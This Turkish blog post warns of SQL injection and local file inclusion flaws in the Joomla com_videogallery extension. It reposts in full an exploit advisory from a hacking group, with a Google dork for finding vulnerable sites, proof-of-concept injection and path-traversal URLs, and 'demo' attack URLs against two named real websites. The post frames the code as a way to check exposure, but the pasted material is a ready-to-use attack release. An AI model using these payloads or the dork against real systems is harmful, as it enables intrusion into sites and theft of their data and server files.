Joomla Video Galerisi Local File Injection Açığı ve SQL Injection Açığı
Murat Kaya
Joomla’nın bir eklentisi olan video Gallery modülünde SQL injection açığı tespit edilmiş ve explot kodları yayınlamış. BU eklentiyi kullananların acil olarak güncelleme yapmaları gerekemktedir.
Açıklıktan etkilenip etkilenmediğinizi anlamak için aaşağıdkai kodları kullanabilirsiniz.
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm KedAns-Dz member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 ### # Title : Joomla com_videogallery (SQLi/LFI) Multiple Vulnerabilites # Author : KedAns-Dz # E-mail : ked-h (@hotmail.com / @1337day.com / @exploit-id.com / @dis9.com) # Home : Hassi.Messaoud (30500) - Algeria -(00213555248701) # Web Site : www.1337day.com # Facebook : < - ! suspended by FB team & Sarc0_oZy ! -> # Friendly Sites : www.dis9.com * www.r00tw0rm.com * www.exploit-id.com # platform : php # Type : Multiple ( SQLi / LFI ) # Security Risk : Hige # Tested on : Windows 7 ### ## # | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << | # | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 | # | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * soucha | # | ***** KinG Of PiraTeS * The g0bl!n * dr.R!dE ***** | # | ------------------------------------------------- < | ## ./ Note: mY FB Account 'fb.me/KedAns' is suspended ! o_O ... > iF U w0nt t0 Contacting With mE on FB Send mSg t0 mY MSN and put U'r FB Acc0unt i'LL add U ^_^ ./ --- E.O.F --- # Google-Dork : ( allinurl:option=com_videogallery ) ' YoU_Upi N0ob's # Exploit/p0c : SQL Inj3ction > http://[Target]/index.php?option=com_videogallery&Itemid=68' http://[Target]/index.php?option=com_videogallery&Itemid=[id]' [ SQLi Here ]-- Local File Include p0c > http://[Target]/&controller=../../../../../../../../../../../../[LFI]%00 # About Vulners .. work just on joomla 1.5.x com_videogallery # Demo's : " Yeaaah n0_0b's i'm BuSy ! just 2 for FuN <3 http://www.zilog.com/index.php?option=com_videogallery&Itemid=68%27 http://www.biarritzeko.com/index.php?option=com_videogallery&controller=../../../../../../../../../../../../[LFI] # The EnD ./ Greetings t0 palestine ./ ^__^ Like aNd Inj0Y #================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]======================================= # Greets To : Dz Offenders Cr3w < Algerians HaCkerS > | Rizky Ariestiyansyah * Islam Caddy * HMD-Cr3w # + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re * CrosS (www.1337day.com) # Inj3ct0r Members 31337 : Indoushka * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n * # Angel Injection (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * xDZx * TM.mOsta # Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X # Kha&miX * Str0ke * JF * Ev!LsCr!pT_Dz * KinG Of PiraTeS * TrOoN * T0xic * L3b-r1Z * r00tw0rm.com # www.packetstormsecurity.org * www.metasploit.com * www.muratkaya.com.tr * I-BT * Dis9UE * All Security and Exploits Webs .. #===================================================================================================
POST YOUR COMMENTS
You must be logged in to post a comment.